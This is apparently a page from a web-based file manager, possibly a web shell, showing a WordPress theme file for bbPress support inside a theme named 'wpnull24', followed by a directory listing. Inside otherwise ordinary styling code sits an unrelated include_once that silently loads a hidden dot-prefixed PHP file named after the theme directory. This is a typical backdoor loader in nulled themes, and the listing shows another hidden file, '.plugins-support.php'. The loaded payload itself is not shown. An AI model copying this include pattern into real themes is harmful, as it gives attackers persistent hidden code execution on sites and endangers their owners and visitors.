PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
wpnull24
/
framework
/
plugins-support
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * bbPress Support * * @link https://bbpress.org/ */ if ( ! class_exists( 'bbPress' ) ) { return; } add_action( 'wp_enqueue_scripts', 'us_bbpress_enqueue_styles', 14 ); if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function us_bbpress_enqueue_styles( $styles ) { global $us_template_directory_uri; wp_dequeue_style( 'bbp-default' ); $min_ext = ( ! ( defined( 'US_DEV' ) AND US_DEV ) ) ? '.min' : ''; if ( ! ( defined( 'US_DEV' ) AND US_DEV ) AND us_get_option( 'optimize_assets', 0 ) == 0 ) { wp_enqueue_style( 'us-bbpress', $us_template_directory_uri . '/css/plugins/bbpress' . $min_ext . '.css', array(), US_THEMEVERSION, 'all' ); } } // Remove Forum summaries add_filter( 'bbp_get_single_forum_description', '__return_false', 10, 2 ); add_filter( 'bbp_get_single_topic_description', '__return_false', 10, 2 );
[+]
..
[-] polylang.php
[edit]
[+]
js_composer
[-] gravityforms.php
[edit]
[-] revslider.php
[edit]
[-] tiny_mce.php
[edit]
[-] bbpress.php
[edit]
[-] wpml.php
[edit]
[+]
woocommerce
[-] us_header_builder.php
[edit]
[-] tablepress.php
[edit]
[-] Ultimate_VC_Addons.php
[edit]
[-] the_events_calendar.php
[edit]
[-] .plugins-support.php
[edit]